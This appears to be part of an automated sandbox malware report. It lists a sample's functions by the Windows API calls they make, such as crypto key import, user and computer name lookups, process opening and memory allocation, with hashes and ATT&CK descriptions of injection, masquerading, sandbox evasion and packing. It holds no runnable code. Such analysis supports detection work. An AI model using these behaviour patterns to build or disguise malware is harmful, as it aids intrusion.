Part of subcall function 02BE661C: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02BE4B72,?,00000000,?), ref: 02BE6625
Part of subcall function 02BE661C: memcpy.NTDLL(00000000,?,?,?,00000002,?,?,02BE4B72,?,00000000,?), ref: 02BE664F
Part of subcall function 02BE661C: memset.NTDLL ref: 02BE6663

SysFreeString.OLEAUT32(00000000), ref: 02BE289C

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: FreeStringlstrlenmemcpymemset
String ID:
API String ID: 1945096531-0
Opcode ID: 4b669c2da2ef87001a97db4bbe8ff17b8f1fe0197b51453a447c8ac067587f44
Instruction ID: 06ae7c3d35791e1c9cb84f554e33ba37bfb406d1a1b41fcea7f179ed398b8b62
Opcode Fuzzy Hash: 4b669c2da2ef87001a97db4bbe8ff17b8f1fe0197b51453a447c8ac067587f44
Instruction Fuzzy Hash: 1601B171900119FFEF419FA4CC00AAABBBDFF04354F014565ED12E7060E770A911C790

Uniqueness

Uniqueness Score: -1.00%

Function 02C5713A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C5718B

Memory Dump Source

Source File: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c51000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7d622894054be6047c692861b25f144f98c62e03b86faea13c177e9da4634682
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 76113C79A00208EFDB01DF98C985E99BFF5AF08350F058094F948AB361D371EA90EF84

Uniqueness

Uniqueness Score: -1.00%

Function 02BE33F1 Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02BE2839: SysFreeString.OLEAUT32(00000000), ref: 02BE289C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,02BE9038,?,00000000,?,00000000,?,02BE528E,?,?,057D5FB8,00000000,?), ref: 02BE3454

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 79f93fca40958f08a28ea98f8b6541aaa7826c7859593ea7edb4b4f41036c46d
Instruction ID: 64d63348e8fbeb2bf081288b18b9b8cfab69d6e148155ec70d518fa3a88910e6
Opcode Fuzzy Hash: 79f93fca40958f08a28ea98f8b6541aaa7826c7859593ea7edb4b4f41036c46d
Instruction Fuzzy Hash: 0D012832900619BBCF239F54CC01FEA3BB9EF04790F4884A4FE1A9B220D7319960DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BE5063 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,02BE3ECE,00000000,?,02BE66D9,00000000,02BE3ECE,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE5074

Part of subcall function 02BE1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 02BE1540
Part of subcall function 02BE1508: memcpy.NTDLL(?,?,00000010), ref: 02BE1559
Part of subcall function 02BE1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,?), ref: 02BE1582
Part of subcall function 02BE1508: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 02BE159A
Part of subcall function 02BE1508: memcpy.NTDLL(00000000,?,?,?), ref: 02BE15EC

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: ba71cb6a2c8f5cf9cb0c073721ceb939e96c6d5fb0f7a38c222d30a2109952b2
Instruction ID: d7f35a98792c47a6145f066c3bafafbd55d219c25d8e5d18e8aa8de5c0823000
Opcode Fuzzy Hash: ba71cb6a2c8f5cf9cb0c073721ceb939e96c6d5fb0f7a38c222d30a2109952b2
Instruction Fuzzy Hash: 78F05E36100108BBCF22AF55DC00DEA3BAEEF843A5B408062FD0ACA111DB71DA959BA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02BE2B91 Relevance: 10.8, APIs: 7, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02BE2BA8

Part of subcall function 02BE6B59: RtlEnterCriticalSection.NTDLL(02BEA38C), ref: 02BE6B75
Part of subcall function 02BE6B59: RtlLeaveCriticalSection.NTDLL(02BEA38C), ref: 02BE6B93

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BE2D19
GetTickCount.KERNEL32 ref: 02BE2D2B
RtlEnterCriticalSection.NTDLL(02BEA38C), ref: 02BE2D3F
RtlLeaveCriticalSection.NTDLL(02BEA38C), ref: 02BE2D5D

Part of subcall function 02BE6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BE66CA
Part of subcall function 02BE6675: StrTrimA.SHLWAPI(00000000,02BE927C,00000000,00000000,02BE3ECE,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE66E7

StrTrimA.SHLWAPI(00000000,02BE9280,?,02BEA3CC), ref: 02BE2D8F

Part of subcall function 02BE7563: lstrcpy.KERNEL32(00000000,02BEA370), ref: 02BE758F
Part of subcall function 02BE7563: lstrcat.KERNEL32(00000000,?), ref: 02BE759A

Part of subcall function 02BE6536: lstrlen.KERNEL32(?,00000000,02BEA318,00000000,02BE6F0A,00000000,?,?,?,00000005,02BEA00C,?,?), ref: 02BE653D
Part of subcall function 02BE6536: memset.NTDLL ref: 02BE6578

wcstombs.NTDLL ref: 02BE2E76

Part of subcall function 02BE597D: SysAllocString.OLEAUT32(?), ref: 02BE59B8

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: CriticalSection$CountEnterHeapLeaveTickTrimlstrcat$AllocAllocateFreeStringlstrcpylstrlenmemsetwcstombs
String ID:
API String ID: 1650279075-0
Opcode ID: a4f2d26767ea41f89b01fb12b6c1de2406b5e01428023f4e4998bf4f2d54e177
Instruction ID: 674e1bac47c67921a8e0be8d6ab77fcc9fde8c9a1e6f0f1b4921c12f3336beea
Opcode Fuzzy Hash: a4f2d26767ea41f89b01fb12b6c1de2406b5e01428023f4e4998bf4f2d54e177
Instruction Fuzzy Hash: 5DA16A71900210EFCF11EB64DC84E5A7BEDEF88794F054968F88ADB221D731D965CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02BE4C94 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(02BE6A76,0000005F,00000000,00000000,00000104), ref: 02BE4CC7
lstrcpy.KERNEL32(?,?), ref: 02BE4CF4

Part of subcall function 02BE6536: lstrlen.KERNEL32(?,00000000,02BEA318,00000000,02BE6F0A,00000000,?,?,?,00000005,02BEA00C,?,?), ref: 02BE653D
Part of subcall function 02BE6536: memset.NTDLL ref: 02BE6578

Part of subcall function 02BE5B0E: lstrlenW.KERNEL32(?,?,?,02BE4E5D,3D02BE90,80000002,02BE6A76,02BE57D1,?,?,02BE57D1,?,3D02BE90,80000002,02BE6A76,?), ref: 02BE5B33

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

lstrcpy.KERNEL32(?,00000000), ref: 02BE4D16

Strings

\, xrefs: 02BE4CFA
(, xrefs: 02BE4D77

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmemset
String ID: ($\
API String ID: 1937832729-1512714803
Opcode ID: bd8cbdfdc2674d5f31841f01215b9ecc0ddd53373b7c142f04ef12c26d97f513
Instruction ID: fdb03535c56ab9331abb6bab204e829a2c3ae78673a4b4bce25adb7291f5780b
Opcode Fuzzy Hash: bd8cbdfdc2674d5f31841f01215b9ecc0ddd53373b7c142f04ef12c26d97f513
Instruction Fuzzy Hash: 3C512872500209EFDF26AFA0DD40EAA7BBAEF08355F008998FA1696160D731D965EF11

Uniqueness

Uniqueness Score: -1.00%

Function 02BE37DF Relevance: 7.6, APIs: 5, Instructions: 109librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02BE6BF9: GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,02BE37FB,?,?,?,?,00000000,00000000), ref: 02BE6C1E

memset.NTDLL ref: 02BE3849
GetModuleHandleA.KERNEL32(?,057D5BB4,?), ref: 02BE387F
GetProcAddress.KERNEL32(00000000), ref: 02BE3886
HeapFree.KERNEL32(00000000,00000000), ref: 02BE38EE

Part of subcall function 02BE5B56: GetProcAddress.KERNEL32(?,02BE2425), ref: 02BE5B71

GetLastError.KERNEL32(00000001), ref: 02BE38D4

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: AddressHandleModuleProc$ErrorFreeHeapLastmemset
String ID:
API String ID: 3302146251-0
Opcode ID: 202ce0c928a1760f76d2b4f27e4aeddf854fb7dcd179491096c8112043cf107a
Instruction ID: cf73d35dc97a5b993710adb84ce6e08a5e8f8729cb047ba12dfe7474069fbc87
Opcode Fuzzy Hash: 202ce0c928a1760f76d2b4f27e4aeddf854fb7dcd179491096c8112043cf107a
Instruction Fuzzy Hash: D2311FB5D00208EFDF10AFA4DC88DAEBBFDEB04354F1144A5E616A7111D731AE58DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BE1340 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02BE1354
GetComputerNameW.KERNEL32(00000000,?), ref: 02BE1370

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

GetUserNameW.ADVAPI32(?,?), ref: 02BE13AA
GetComputerNameW.KERNEL32(?,?), ref: 02BE13CD
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 02BE13F0

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 8cbe3cb68b98ef598de1feb4818d8cc6ae355b1f2b1f2ba2f094ff1a9121fdaa
Instruction ID: 944d34d9184a55b639e46749096953611739e7e01838098c68cfa72c15f030b4
Opcode Fuzzy Hash: 8cbe3cb68b98ef598de1feb4818d8cc6ae355b1f2b1f2ba2f094ff1a9121fdaa
Instruction Fuzzy Hash: 3C21D8B6900108FFCF11DFE9D9849EEBBBCEF44244B6544AAE506E7241DB309B45DB11

Uniqueness

Uniqueness Score: -1.00%

Function 02BE54D8 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BE5037,?), ref: 02BE54E0
GetVersion.KERNEL32 ref: 02BE54EF
GetCurrentProcessId.KERNEL32 ref: 02BE550B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02BE5528
GetLastError.KERNEL32 ref: 02BE5547

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 59f03065aea5abfe66822753f43de8bee43ca9333ec71053c868883565079c1b
Instruction ID: cdcf5d139dd1e477ed892df7498d8080d306fc34d2098b068a55dcd38d0ea388
Opcode Fuzzy Hash: 59f03065aea5abfe66822753f43de8bee43ca9333ec71053c868883565079c1b
Instruction Fuzzy Hash: 98F08CB4EC0302DBDF308B20A81AB283BA6E700795FA04C59E553EF1C2E77090A4CB15

Uniqueness

Uniqueness Score: -1.00%

Function 02BE597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02BE59B8
SysFreeString.OLEAUT32(00000000), ref: 02BE5A9D

Part of subcall function 02BE6CDF: SysAllocString.OLEAUT32(02BE9284), ref: 02BE6D2F

SafeArrayDestroy.OLEAUT32(00000000), ref: 02BE5AF0
SysFreeString.OLEAUT32(00000000), ref: 02BE5AFF

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafe
String ID:
API String ID: 2618382806-0
Opcode ID: 6103e95f7f5d1988788d40789c1300644a6cbfbf9608dbd2aa8d1038eee2e02e
Instruction ID: f9decfd06618a0a31d00cbc5e6fa9ebe24312673509f01dc516b8b2d5b0a9b51
Opcode Fuzzy Hash: 6103e95f7f5d1988788d40789c1300644a6cbfbf9608dbd2aa8d1038eee2e02e
Instruction Fuzzy Hash: E5518075900609EFDF11DFA8C884A9EB7B6FF88748F148869E516DB210DB30ED49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BE49D0 Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02BE74EC: lstrlen.KERNEL32(00000005,00000000,?,00000027,00000000,02BEA318,00000000,?,?,?,00000005,02BEA00C,?,?), ref: 02BE7522
Part of subcall function 02BE74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02BE7546
Part of subcall function 02BE74EC: lstrcat.KERNEL32(00000000,00000000), ref: 02BE754E

CreateEventA.KERNEL32(02BEA34C,00000001,00000000,00000000,?,00000001,00000000,?,?,00000000,?,02BE6A95,?,?,?), ref: 02BE4A11

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000000,?,02BE6A95,?,?,?), ref: 02BE4A71
WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000001,00000000,?,?,00000000,?,02BE6A95,?,?,?), ref: 02BE4A9F
CloseHandle.KERNEL32(00000000,?,00000001,00000000,?,?,00000000,?,02BE6A95,?,?,?), ref: 02BE4AB7

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 1722047ea6dce39ce8cc7b46dc0c794eb48df066371a954fc8acb912f5c3eb23
Instruction ID: 021c044cd07283a131bee53ef4d42b03765bb5b9c8946cfda6e06e496d9cda29
Opcode Fuzzy Hash: 1722047ea6dce39ce8cc7b46dc0c794eb48df066371a954fc8acb912f5c3eb23
Instruction Fuzzy Hash: 45212C32A403119BCF319A648C48B6B77FDEF48779B051695FD63DB141DB60CC409B58

Uniqueness

Uniqueness Score: -1.00%

Function 02BE3FA5 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?), ref: 02BE3FBC
SetEvent.KERNEL32(?), ref: 02BE3FCC
GetLastError.KERNEL32 ref: 02BE4055

Part of subcall function 02BE16B2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 02BE16CD

Part of subcall function 02BE61DA: HeapFree.KERNEL32(00000000,00000000,02BE11EA,?,00000000,00000001), ref: 02BE61E6

GetLastError.KERNEL32(00000000), ref: 02BE408A

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 9cba7850b5545f8bd6e8d7130a0ee2a98ef5d6b5d63443267aae4ca046f42776
Instruction ID: 72f96da5c72c6ad4b052ff7bf6be1c12fc968fb677441f024882683c8feaff50
Opcode Fuzzy Hash: 9cba7850b5545f8bd6e8d7130a0ee2a98ef5d6b5d63443267aae4ca046f42776
Instruction Fuzzy Hash: 3F310BB5D00709EFDF20DFA5C8849AEBBB8EB48344F1049B9E603A7142D771AA48DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02BE69E6 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(02BEA34C,00000001,00000000,00000040,?,?,02BE9038,00000000,02BE905C), ref: 02BE6A37
SetEvent.KERNEL32(00000000), ref: 02BE6A44
Sleep.KERNEL32(00000BB8), ref: 02BE6A4F
CloseHandle.KERNEL32(00000000), ref: 02BE6A56

Part of subcall function 02BE5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BE6A76,?,02BE6A76,?,?,?,?,?,02BE6A76,?), ref: 02BE57DE

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: e3445074122530f6352b5d5274ca60bbc18bc6976f5089d4fbbbadcaef3f9ac6
Instruction ID: 30e78ece40a71c9263f7f2128807ad13e2a4bb51ad44b9245feed8b311ed8351
Opcode Fuzzy Hash: e3445074122530f6352b5d5274ca60bbc18bc6976f5089d4fbbbadcaef3f9ac6
Instruction Fuzzy Hash: 9A21A772D00119EBCF20EFE598849DE77BDEF14354B0598A9EA23A7100D730A9858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BE4461 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000C8), ref: 02BE448F
lstrlenW.KERNEL32(?), ref: 02BE44C5
memcpy.NTDLL(00000000,?,?,?), ref: 02BE44E6
SysFreeString.OLEAUT32(?), ref: 02BE44FA

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: da0beb64e0ce60fb59c89d42c11f1422b7ae897eb4863b5da37b93352a86de8c
Instruction ID: aefceff57cd9edbc633467543e3472e9aecb9e477ccdbaa326593156012e9a69
Opcode Fuzzy Hash: da0beb64e0ce60fb59c89d42c11f1422b7ae897eb4863b5da37b93352a86de8c
Instruction Fuzzy Hash: 38213D75A00609EFCF11DFA8D98499EBBF9FF49354B1081A9E906A7301EB30DA45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BE2708 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BE6708,00000000,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE2713
RtlAllocateHeap.NTDLL(00000000,?), ref: 02BE272B
memcpy.NTDLL(00000000,02BEA3CC,-00000008,?,?,?,02BE6708,00000000,?,02BEA134,02BE3ECE,00000000,02BEA3CC), ref: 02BE276F
memcpy.NTDLL(00000001,02BEA3CC,00000001,02BE3ECE,00000000,02BEA3CC), ref: 02BE2790

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 64b6d253f239475573ef4827686b167f0af38c6349ac589159f7402914fb7776
Instruction ID: d026b4df08d3b014a7eef7e4b74a6df2cd127406e33ef21a959617ba11bf1ce7
Opcode Fuzzy Hash: 64b6d253f239475573ef4827686b167f0af38c6349ac589159f7402914fb7776
Instruction Fuzzy Hash: 271129B2E00214AFDB10CF69DC85D9E7BFEEB803A1B1501B6F805EB240E7719E1497A0

Uniqueness

Uniqueness Score: -1.00%

Function 02BE3230 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(02BEA30C,00000001,02BE109A), ref: 02BE323B
SleepEx.KERNEL32(00000064,00000001), ref: 02BE324A
CloseHandle.KERNEL32(02BEA30C), ref: 02BE326B
HeapDestroy.KERNEL32(02BEA2D8), ref: 02BE327B

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: de7bc4c9b04439fa0bc7ff43a5aebc8a75ac6a320b64c861764d5374d5cc44b3
Instruction ID: 3ed1b8a8088cfb3f62db5cac27116807e39bc69896de9f25d70f5a3a4986474d
Opcode Fuzzy Hash: de7bc4c9b04439fa0bc7ff43a5aebc8a75ac6a320b64c861764d5374d5cc44b3
Instruction Fuzzy Hash: 74F03075E80751D7DF109B759988AA23BECEB047E1B044AD0BC82EB2C2DB20D4549960

Uniqueness

Uniqueness Score: -1.00%

Function 02BE607C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02BEA38C), ref: 02BE6085
Sleep.KERNEL32(0000000A), ref: 02BE608F
HeapFree.KERNEL32(00000000), ref: 02BE60BD
RtlLeaveCriticalSection.NTDLL(02BEA38C), ref: 02BE60D2

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 8c3ef63bf39451f8f9b517c7450bb15916dea2f317e44868999d1e905d04e0a7
Instruction ID: 090669d55133d8ccca29094aa6f036ad2e17dabfd5eedd971648f511e9bcdfac
Opcode Fuzzy Hash: 8c3ef63bf39451f8f9b517c7450bb15916dea2f317e44868999d1e905d04e0a7
Instruction Fuzzy Hash: 47F0FE74A80601DFEF18CF55D889B153BB9EB54391B088845E903DF392D734A868CA25

Uniqueness

Uniqueness Score: -1.00%

Function 02BE2058 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02BE2064

Part of subcall function 02BE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BE119A), ref: 02BE33E8

memcpy.NTDLL(00000000,?,?,?,00000001,00000001), ref: 02BE20C2
lstrcpy.KERNEL32(00000000,?), ref: 02BE20D2
lstrcpy.KERNEL32(00000000,?), ref: 02BE20DE

Memory Dump Source

Source File: 00000005.00000002.2850330124.0000000002BE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2be1000_server.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 998b1e75bda1c0810caafe98e8a82dc647955eac4c9db8d975f62c4cdbc1a669
Instruction ID: 4d93ca12d32274ffd2219320003e56131fca4fe0253c16d5228ce7b4b75f31d8
Opcode Fuzzy Hash: 998b1e75bda1c0810caafe98e8a82dc647955eac4c9db8d975f62c4cdbc1a669
Instruction Fuzzy Hash: 03219D72500255EBCF12AFA4CC44AAABFBEEF05394B148095FD069B202DB71DA41CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

